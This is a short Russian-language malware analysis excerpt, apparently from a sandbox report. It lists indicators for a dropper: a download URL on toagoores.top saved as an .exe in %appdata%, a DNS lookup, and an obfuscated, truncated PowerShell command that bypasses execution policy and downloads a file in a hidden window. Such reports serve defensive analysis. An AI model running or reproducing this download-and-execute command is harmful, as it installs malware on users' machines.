Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wers^hELl.^eXe -ex^ecuTIo^NpOLI^c^y b^YpASs -noPrO^f^ILe^ ^-WIn^d^O^WStYLe^ H^iDDEn ^(^NeW-^O^B^Je^ct SYStEM^.n^ET^.w^EbcL^ienT^)^.^D^O^wn^lOadF^ile(^'http://toagoores.top/r...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wers^hELl.^eXe -ex^ecuTIo^NpOLI^c^y b^YpASs -noPrO^f^ILe^ ^-WIn^d^O^WStYLe^ H^iDDEn ^(^NeW-^O^B^Je^ct SYStEM^.n^ET^.w^EbcL^ienT^)^.^D^O^wn^lOadF^ile(^'http://toagoores.top/r...' (со скрытым окном)